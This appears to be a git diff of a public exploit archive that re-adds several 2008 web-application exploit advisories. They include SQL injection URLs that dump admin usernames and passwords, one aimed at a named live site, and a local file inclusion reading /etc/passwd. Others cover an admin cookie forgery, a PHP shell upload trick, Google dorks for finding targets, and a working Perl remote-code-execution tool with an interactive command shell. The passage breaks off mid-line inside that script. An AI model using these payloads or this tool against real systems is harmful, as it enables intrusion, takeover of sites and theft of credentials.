+sSet Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders •
+Installation Support available
+
+---------------------------------------------------------------------------
+
+Vulnerability:
+~~~~~~~~~~~~~
+
+Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used
+in an sql query.
+This can be exploited thru the browser to manipulate SQL queries and pull the username and password
+from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.
+
+
+Poc/Exploit:
+~~~~~~~~~
+
+http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
+http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
+
+Admin Login at http://www.example.com/[PATH]/oneadmin/
+
+Dork:
+~~~~
+Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
+
+
+Solution:
+~~~~~~
+
+- Edit the source code to ensure that input is properly verified.
+- Turn on magic_quotes in php.ini
+
+
+Timeline:
+~~~~~~~~
+
+- 11 - 07 - 2008 bug found
+- 11 - 07 - 2008 vendor contacted
+- 14 - 07 - 2008 advisory released
+---------------------------------------------------------------------------
+
+Shoutz:
+~~~~
+~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
+~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
+the_hydra,neng chika, str0ke
+~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
+~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
+super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
+~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
+kuntua, stev_manado,nofry,k1tk4t,0pt1c
+~ newbie_hacker@yahoogroups.com
+~ #aikmel #e-c-h-o @irc.dal.net
+
+---------------------------------------------------------------------------
+Contact:
+~~~~~
+
+K-159 || echo|staff || eufrato[at]gmail[dot]com
+Homepage: http://www.e-rdc.org/
+
+-------------------------------- [ EOF ] ----------------------------------
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6080.txt b/platforms/php/webapps/6080.txt
index ac2986180..8041ff01a 100755
--- a/platforms/php/webapps/6080.txt
+++ b/platforms/php/webapps/6080.txt
@@ -1,36 +1,36 @@
-#####################################################
-# Author : BeyazKurt
-# Contact : Djm-sut@Hotmail.Com
-#
-# Script : php Help Agent (v1.1 Full & 1.0)
-# Risk : Local File Include
-# Download : http://sourceforge.net/projects/phphelpagent/
-#
-# File : include/head_chat.inc.php
-#
-# Code :
-#
-#
-# Exploit :
-#
-# Vuln.Com/include/head_chat.inc.php?content=../../../../etc/passwd
-#
-# /* Hack Is Not Crime! */
-# -------------------------------
-# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-# Proud 2 Be ALBANIAN
-# 4Ever FENERBAHÇE (H)
-#
-# Z0ne-H gicik v1 is public :D (Download NetkabuS.CoM)
-# Not : Fuck off pala! aq lameri.
-#
-# Thnx : All Muslims Albanian & Turkish Coder..
-# Thnx : dArkSAnqelSu | anladin sen onu anladin... :)
-#
-#######################################################
-
-# milw0rm.com [2008-07-15]
+#####################################################
+# Author : BeyazKurt
+# Contact : Djm-sut@Hotmail.Com
+#
+# Script : php Help Agent (v1.1 Full & 1.0)
+# Risk : Local File Include
+# Download : http://sourceforge.net/projects/phphelpagent/
+#
+# File : include/head_chat.inc.php
+#
+# Code :
+#
+#
+# Exploit :
+#
+# Vuln.Com/include/head_chat.inc.php?content=../../../../etc/passwd
+#
+# /* Hack Is Not Crime! */
+# -------------------------------
+# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+# Proud 2 Be ALBANIAN
+# 4Ever FENERBAHÇE (H)
+#
+# Z0ne-H gicik v1 is public :D (Download NetkabuS.CoM)
+# Not : Fuck off pala! aq lameri.
+#
+# Thnx : All Muslims Albanian & Turkish Coder..
+# Thnx : dArkSAnqelSu | anladin sen onu anladin... :)
+#
+#######################################################
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6081.txt b/platforms/php/webapps/6081.txt
index bc5d02402..02cdee36e 100755
--- a/platforms/php/webapps/6081.txt
+++ b/platforms/php/webapps/6081.txt
@@ -1,44 +1,44 @@ - ############################################################################################ - # # - # ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... # - ############################################################################################ - -Virangar Security Team - -www.virangar.net -www.virangar.ir - --------- -Discoverd By :virangar security team(hadihadi) - -special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra - -& all virangar members & all hackerz - -greetz:to my best friend in the world hadi_aryaie2004 -& my lovely friend arash(imm02tal) -------- -DESCRIPTION: -Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates -a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt -contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are -logged in as a legit admin. ---- -vuln code in /Admin/index.php: - -if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){ -top(); -menu(); -echo $wellcome_admin; -foot(); -} - ---- -exploit: -javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/"; ------ -now visit /admin and you can get admin access and manage the cms ;) -------- -young iranian h4ck3rz - -# milw0rm.com [2008-07-15] + ############################################################################################ + # # + # ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... 
# + ############################################################################################ + +Virangar Security Team + +www.virangar.net +www.virangar.ir + +-------- +Discoverd By :virangar security team(hadihadi) + +special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra + +& all virangar members & all hackerz + +greetz:to my best friend in the world hadi_aryaie2004 +& my lovely friend arash(imm02tal) +------- +DESCRIPTION: +Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates +a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt +contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are +logged in as a legit admin. +--- +vuln code in /Admin/index.php: + +if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){ +top(); +menu(); +echo $wellcome_admin; +foot(); +} + +--- +exploit: +javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/"; +----- +now visit /admin and you can get admin access and manage the cms ;) +------- +young iranian h4ck3rz + +# milw0rm.com [2008-07-15] diff --git a/platforms/php/webapps/6082.txt b/platforms/php/webapps/6082.txt index 9679990c9..d26f2b409 100755 --- a/platforms/php/webapps/6082.txt +++ b/platforms/php/webapps/6082.txt 
@@ -1,50 +1,50 @@ -vBulletin PhotoPost vBGallery v2.x Remote File Upload - -Found by : Cold z3ro - -e-mail : exploiter@hackteach.org - -Home page : www.Hack.ps - -============================== - -exploit usage : - -http://localhost/Forum/$gallery_path/upload.php - -here the exploiter can upload php shell via this script - -by renamed it's name to $name.php.wmv - -but first he should be a user in the forum - -thats so important to him cus the uploaded file will be - -in his account nomber folder . - -example : - -user : Cold z3ro -http://www.hackteach.org/cc/member.php?u=4 - -his account nomber is 4 as shown in link , - -the uploaded file ( shell ) will be in - -http://localhost/Forum/$gallery_path/files/4/$name.php.wmv - -id the user Cold z3ro have acconut nomber as example ( 12345 ) - -the file path is - -http://localhost/Forum/$gallery_path/files/1/2/3/4/5/$name.php.wmv - -=================== - -i want tho thank all members in www.hackteach.org forums , best work u are done. - -thank u . - -# hackteach.org - -# milw0rm.com [2008-07-15] +vBulletin PhotoPost vBGallery v2.x Remote File Upload + +Found by : Cold z3ro + +e-mail : exploiter@hackteach.org + +Home page : www.Hack.ps + +============================== + +exploit usage : + +http://localhost/Forum/$gallery_path/upload.php + +here the exploiter can upload php shell via this script + +by renamed it's name to $name.php.wmv + +but first he should be a user in the forum + +thats so important to him cus the uploaded file will be + +in his account nomber folder . 
+ +example : + +user : Cold z3ro +http://www.hackteach.org/cc/member.php?u=4 + +his account nomber is 4 as shown in link , + +the uploaded file ( shell ) will be in + +http://localhost/Forum/$gallery_path/files/4/$name.php.wmv + +id the user Cold z3ro have acconut nomber as example ( 12345 ) + +the file path is + +http://localhost/Forum/$gallery_path/files/1/2/3/4/5/$name.php.wmv + +=================== + +i want tho thank all members in www.hackteach.org forums , best work u are done. + +thank u . + +# hackteach.org + +# milw0rm.com [2008-07-15] diff --git a/platforms/php/webapps/6084.txt b/platforms/php/webapps/6084.txt index d0c761d00..2ddf9c15a 100755 --- a/platforms/php/webapps/6084.txt +++ b/platforms/php/webapps/6084.txt 
@@ -1,42 +1,42 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## Hockeystats Online V BASIC & ADVANCED ( index.php opt ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRiAN Arab HACkErS -######################## -######################## -## -## -[[: L!VE DEMO :]]- -## -## [[BASIC VERSION]] www.thehockeystop.com/hstatsbasic/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/* -## www.thehockeystop.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/* -## -## [[ADVANCED VERSION]] www.thehockeystop.com/hockeystats/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/* -## www.thehockeystop.com/hockeystats/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/* -######################## -######################## --[[ NOTE ]]- -1 ) In the first exploite you you need set the real id ?opt=viewpage&type=html&id=-< real id >'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/* -2 ) Download [[Basic version]] code from here ;D http://www.thehockeystop.com/site/downloads/HSO_basic/HockeySTATS_Basic.zip - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-15] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## Hockeystats Online V BASIC & ADVANCED ( index.php opt ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRiAN Arab HACkErS +######################## +######################## +## +## -[[: L!VE DEMO :]]- +## +## [[BASIC VERSION]] www.thehockeystop.com/hstatsbasic/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/* +## www.thehockeystop.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/* +## +## [[ADVANCED VERSION]] www.thehockeystop.com/hockeystats/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/* +## www.thehockeystop.com/hockeystats/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/* +######################## +######################## +-[[ NOTE ]]- +1 ) In the first exploite you you need set the real id ?opt=viewpage&type=html&id=-< real id >'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/* +2 ) Download [[Basic version]] code from here ;D http://www.thehockeystop.com/site/downloads/HSO_basic/HockeySTATS_Basic.zip + 
+####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-15] diff --git a/platforms/php/webapps/6085.pl b/platforms/php/webapps/6085.pl index 5a9ebc6d3..17bbca862 100755 --- a/platforms/php/webapps/6085.pl +++ b/platforms/php/webapps/6085.pl 
@@ -1,438 +1,438 @@ -#!/usr/bin/perl -#inphex -#PHPizabi v0.848b C1 HFP1 Remote Code Execution -#http://www.dz-secure.com/tools/1/WebESploit.pl.txt -#if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com -#system/v_cron_proc.php -# if (!function_exists("writeLogEntry")) { -# function writeLogEntry($data) { -# global $CONF; -# -# touch($CONF["CRON_LOGFILE"]); -# -# if ($handle = fopen($CONF["CRON_LOGFILE"], "a")) { -# fwrite($handle, "[".date($CONF["LOCALE_LONG_DATE_TIME"])."] $data \n"); -# fclose($handle); -# } -# } -# } -# -# -#writeLogEntry("Cron cycle started"); -#writeLogEntry("Cron cycle ended"); -######################################################## -#overwritable: -#1.$CONF["CRON_LOGFILE"] -#2.$CONF["LOCALE_LONG_DATE_TIME"] -# -#date($CONF["LOCALE_LONG_DATE_TIME"]) ;\ -#solution: -# -#returns: pm -# -#returns: a -#seems logically eh? -# -#usage: perl ye.pl host /path/ -# -## [C:\]# perl ye.pl host /path/ -## $[host]# id -## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data) -# -use LWP::UserAgent; -use HTTP::Cookies; -use Switch; - -$hy = shift; -$host_ = "http://".$hy; -$path_ = shift; -$port = 80; #default -$info{'info'} = { - "description" => [""], - "options" => - { - "agent" => "", - "proxy" => "", - "default_headers" => [ - ["key","value"]], - "timeout" => 0, - "cookie" => - { - "cookie" => [""], - }, - }, - "sending_options" => - { - "host" => $host_, - "path" => $path_."system/v_cron_proc.php", - "port" => $port, - "method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION", - "attack" => - { - "CONF[CRON_LOGFILE]" => ["get","CONF[CRON_LOGFILE]","yeee.php"], - "CONF[LOCALE_LONG_DATE_TIME]" => ["get","CONF[LOCALE_LONG_DATE_TIME]",""], #nice eh?:) - }, - }, - -}; - -&start($info{'info'},222); -while () { - print "\$[".$hy."]#"; - $cmd = ;chomp($cmd); - $info{'info'} = { - "description" => [""], - "options" => - { - "agent" => "", - "proxy" => "", - "default_headers" => [ - ["key","value"]], - 
"timeout" => 0, - "cookie" => - { - "cookie" => [""], - }, - }, - "sending_options" => - { - "host" => $host_, - "path" => $path_."system/yeee.php", - "port" => $port, - "method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION", - "attack" => - { - "CONF[CRON_LOGFILE]" => ["get","cmd",$cmd], - }, - }, - - }; - -&start($info{'info'},221); -print ${$info{'info'}}{221}{'content'}."\n"; -} -sub start -{ - - $a_ = shift; - $id = shift; - $post_dA = ""; - $get_dA = get_d_p_s("get"); - $post_dA = get_d_p_s("post"); - - my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); - $jj = 1; - $ii = 48; - $hh = 1; - $ppp = 0; - $s = shift; - $a = ""; - $res_p = ""; - $h = ""; - $ua= ""; - $agent= ""; - $k= ""; - $v= ""; - $get_data= ""; - $post_data= ""; - $header_dA = ""; - $h_host_h_xdsjaop = $a_->{'sending_options'}{'host'}; - $h_path_h_xdsjaop = $a_->{'sending_options'}{'path'}; - $h_port_h_xdsjaop = $a_->{'sending_options'}{'port'}; - $method_m = $a_->{'sending_options'}{'method_a'}; - $ua = LWP::UserAgent->new; - $ua->timeout($a_->{'options'}{'timeout'}); - if ($a_->{'options'}{'proxy'}) { - $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); - } - $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; - $ua->agent($agent); - { - while (($k,$v) = each(%{$a_})) - { - if ($k ne "options" && $k ne "sending_options") - { - foreach $r (@{$a_->{$k}}) - { - print $a_->{$k}[0]; - } - } - } - - - foreach $j (@{$a_->{'options'}{'default_headers'}}) - { - $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); - $m++; - } - - if ($a_->{'options'}{'cookie'}{'cookie'}[0]) - { - $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); - } - - - - } - switch ($method_m) - { - case "attack" { &attack();} - case "SQL_INJECTION_BLIND" { &sql_injection_blind();} - case "REMOTE_COMMAND_EXECUTION" { &attack();} - case "REMOTE_CODE_EXECUTION" {&attack();} - case "REMOTE_FILE_INCLUSION" { 
&attack();} - case "LOCAL_FILE_INCLUSION" { &attack(); } - else { &attack(); } - - } - - - sub attack - { - my ($jj); - my ($h); - my($x); - if ($post_dA eq "") { - $method = "get"; - } elsif ($post_dA ne "") - { - $method = "post"; - } - if ($method eq "get") { - $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA); - ${$a_}{$id}{'content'} = $res_p; - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; - - while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) - { - if (${$jj} ne "") - { - ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; - $x++; - } - $jj++; - } - - $h++; - } - } elsif ($method eq "post") - { - $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA); - - ${$a_}{$id}{'content'} = $res_p; - - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; - while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) - { - if (${$jj} ne "") - { - ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; - $x++; - } - $jj++; - } - $h++; - } - } - - } - sub sql_injection_blind - { - while () - { - while ($ii <= 120) - { - - $itsx = "[".chr($ii)."]"; - $l = length($itsx); - $b = ("\b")x$l; - syswrite STDOUT,$b.$itsx; - - if(check($ii,$hh) == 1) - { - syswrite STDOUT,$b.chr($ii)."---"; - $hh++; - $chr = $chr.chr($ii); - } - $ii++; - } - push(@ffs,length($chr)); - if (($#ffs - 999) == $ffs) - { - exit; - } - $ii = 48; - } - } - sub check($$) - { - my ($h); - my ($a); - $ii = shift; - $hh = shift; - - if (get_d_p_s("post") ne "") - { - $method = "post"; - } else { $method = "get";} - if ($method eq "get") - { - $ppp++; - $query = modify($get_dA,$ii,$hh); - $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query); - - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - if ($res_p 
=~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) - { - if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { - return 1; - } else { return 0;} - } - else - { - if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { - return 0; - }else { return 1;} - - - } - $h++; - } - } elsif ($method eq "post") - { - $ppp++; - $query_g = modify($get_dA,$ii,$hh); - $query_p = modify($post_dA,$ii,$hh); - - $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p); - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) - { - return 1; - } - else - { - return 0; - } - $h++; - } - } - } - sub modify($$$) - { - $string = shift; - $replace_by = shift; - $replace_by1 = shift; - - if ($string !~/\$i/ && $string !~/\$h/) { - return $string; - } elsif ($string !~/\$i/) - { - $ff = substr($string,0,index($string,"\$h")); - $ee = substr($string,rindex($string,"\$h")+2); - $string = $ff.$replace_by1.$ee; - - return $string; - } elsif ($string !~/\$h/) - { - $f = substr($string,0,index($string,"\$i")); - $e = substr($string,rindex($string,"\$i")+2); - $string = $f.$replace_by.$e; - return $string; - } else - { - $f = substr($string,0,index($string,"\$i")); - $e = substr($string,rindex($string,"\$i")+2); - $string = $f.$replace_by.$e; - - $ff = substr($string,0,index($string,"\$h")); - $ee = substr($string,rindex($string,"\$h")+2); - $string = $ff.$replace_by1.$ee; - - return $string; - } - } - sub get_d_p_s - { - $k = 0; - $v = 0; - $g_d_p_s = shift; - - @post = (); - @get = (); - - $post_data = ""; - $get_data = ""; - $header_data = ""; - %header_dA = (); - $p = ""; - $g = ""; - while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) - { - if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/) - { - $p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; - } elsif 
($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) { - $g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; - } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") - { - $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; - } - } - if ($g_d_p_s eq "get") - { - return $g; - } - elsif ($g_d_p_s eq "post") - { - return $p; - } elsif ($g_d_p_s eq "header") - { - return %header_dA; - } - - @a_ = (); - } - sub get_data - { - $h_host_h_xdsjaop = shift; - $h_path_h_xdsjaop = shift; - %hash = get_d_p_s("header"); - while (($u,$c) = each(%hash)) - { - $ua->default_headers->push_header($u => $c); - } - $req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); - return $req->content; - } - sub post_data - { - $h_host_h_xdsjaop = shift; - $h_path_h_xdsjaop = shift; - $content_type = shift; - $send = shift; - %hash = get_d_p_s("header"); - while (($u,$c) = each(%hash)) - { - $ua->default_headers->push_header($u => $c); - } - $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); - $req->content_type($content_type); - $req->content($send); - $res = $ua->request($req); - return $res->content; - } - -} - -# milw0rm.com [2008-07-16] +#!/usr/bin/perl +#inphex +#PHPizabi v0.848b C1 HFP1 Remote Code Execution +#http://www.dz-secure.com/tools/1/WebESploit.pl.txt +#if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com +#system/v_cron_proc.php +# if (!function_exists("writeLogEntry")) { +# function writeLogEntry($data) { +# global $CONF; +# +# touch($CONF["CRON_LOGFILE"]); +# +# if ($handle = fopen($CONF["CRON_LOGFILE"], "a")) { +# fwrite($handle, "[".date($CONF["LOCALE_LONG_DATE_TIME"])."] $data \n"); +# fclose($handle); +# } +# } +# } +# +# +#writeLogEntry("Cron cycle started"); +#writeLogEntry("Cron cycle ended"); 
+######################################################## +#overwritable: +#1.$CONF["CRON_LOGFILE"] +#2.$CONF["LOCALE_LONG_DATE_TIME"] +# +#date($CONF["LOCALE_LONG_DATE_TIME"]) ;\ +#solution: +# +#returns: pm +# +#returns: a +#seems logically eh? +# +#usage: perl ye.pl host /path/ +# +## [C:\]# perl ye.pl host /path/ +## $[host]# id +## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data) +# +use LWP::UserAgent; +use HTTP::Cookies; +use Switch; + +$hy = shift; +$host_ = "http://".$hy; +$path_ = shift; +$port = 80; #default +$info{'info'} = { + "description" => [""], + "options" => + { + "agent" => "", + "proxy" => "", + "default_headers" => [ + ["key","value"]], + "timeout" => 0, + "cookie" => + { + "cookie" => [""], + }, + }, + "sending_options" => + { + "host" => $host_, + "path" => $path_."system/v_cron_proc.php", + "port" => $port, + "method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION", + "attack" => + { + "CONF[CRON_LOGFILE]" => ["get","CONF[CRON_LOGFILE]","yeee.php"], + "CONF[LOCALE_LONG_DATE_TIME]" => ["get","CONF[LOCALE_LONG_DATE_TIME]",""], #nice eh?:) + }, + }, + +}; + +&start($info{'info'},222); +while () { + print "\$[".$hy."]#"; + $cmd = ;chomp($cmd); + $info{'info'} = { + "description" => [""], + "options" => + { + "agent" => "", + "proxy" => "", + "default_headers" => [ + ["key","value"]], + "timeout" => 0, + "cookie" => + { + "cookie" => [""], + }, + }, + "sending_options" => + { + "host" => $host_, + "path" => $path_."system/yeee.php", + "port" => $port, + "method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION", + "attack" => + { + "CONF[CRON_LOGFILE]" => ["get","cmd",$cmd], + }, + }, + + }; + +&start($info{'info'},221); +print ${$info{'info'}}{221}{'content'}."\n"; +} +sub start +{ + + $a_ = shift; + $id = shift; + $post_dA = ""; + $get_dA = get_d_p_s("get"); + $post_dA = get_d_p_s("post"); + + my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); + $jj = 1; + $ii = 48; + $hh = 1; + $ppp = 0; + $s = shift; + $a = ""; + $res_p = ""; + $h = ""; + $ua= 
""; + $agent= ""; + $k= ""; + $v= ""; + $get_data= ""; + $post_data= ""; + $header_dA = ""; + $h_host_h_xdsjaop = $a_->{'sending_options'}{'host'}; + $h_path_h_xdsjaop = $a_->{'sending_options'}{'path'}; + $h_port_h_xdsjaop = $a_->{'sending_options'}{'port'}; + $method_m = $a_->{'sending_options'}{'method_a'}; + $ua = LWP::UserAgent->new; + $ua->timeout($a_->{'options'}{'timeout'}); + if ($a_->{'options'}{'proxy'}) { + $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); + } + $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; + $ua->agent($agent); + { + while (($k,$v) = each(%{$a_})) + { + if ($k ne "options" && $k ne "sending_options") + { + foreach $r (@{$a_->{$k}}) + { + print $a_->{$k}[0]; + } + } + } + + + foreach $j (@{$a_->{'options'}{'default_headers'}}) + { + $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); + $m++; + } + + if ($a_->{'options'}{'cookie'}{'cookie'}[0]) + { + $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); + } + + + + } + switch ($method_m) + { + case "attack" { &attack();} + case "SQL_INJECTION_BLIND" { &sql_injection_blind();} + case "REMOTE_COMMAND_EXECUTION" { &attack();} + case "REMOTE_CODE_EXECUTION" {&attack();} + case "REMOTE_FILE_INCLUSION" { &attack();} + case "LOCAL_FILE_INCLUSION" { &attack(); } + else { &attack(); } + + } + + + sub attack + { + my ($jj); + my ($h); + my($x); + if ($post_dA eq "") { + $method = "get"; + } elsif ($post_dA ne "") + { + $method = "post"; + } + if ($method eq "get") { + $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA); + ${$a_}{$id}{'content'} = $res_p; + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; + + while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) + { + if (${$jj} ne "") + { + ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; + $x++; + } + $jj++; + } + + $h++; + } + } 
elsif ($method eq "post") + { + $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA); + + ${$a_}{$id}{'content'} = $res_p; + + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; + while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) + { + if (${$jj} ne "") + { + ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; + $x++; + } + $jj++; + } + $h++; + } + } + + } + sub sql_injection_blind + { + while () + { + while ($ii <= 120) + { + + $itsx = "[".chr($ii)."]"; + $l = length($itsx); + $b = ("\b")x$l; + syswrite STDOUT,$b.$itsx; + + if(check($ii,$hh) == 1) + { + syswrite STDOUT,$b.chr($ii)."---"; + $hh++; + $chr = $chr.chr($ii); + } + $ii++; + } + push(@ffs,length($chr)); + if (($#ffs - 999) == $ffs) + { + exit; + } + $ii = 48; + } + } + sub check($$) + { + my ($h); + my ($a); + $ii = shift; + $hh = shift; + + if (get_d_p_s("post") ne "") + { + $method = "post"; + } else { $method = "get";} + if ($method eq "get") + { + $ppp++; + $query = modify($get_dA,$ii,$hh); + $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query); + + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) + { + if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { + return 1; + } else { return 0;} + } + else + { + if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { + return 0; + }else { return 1;} + + + } + $h++; + } + } elsif ($method eq "post") + { + $ppp++; + $query_g = 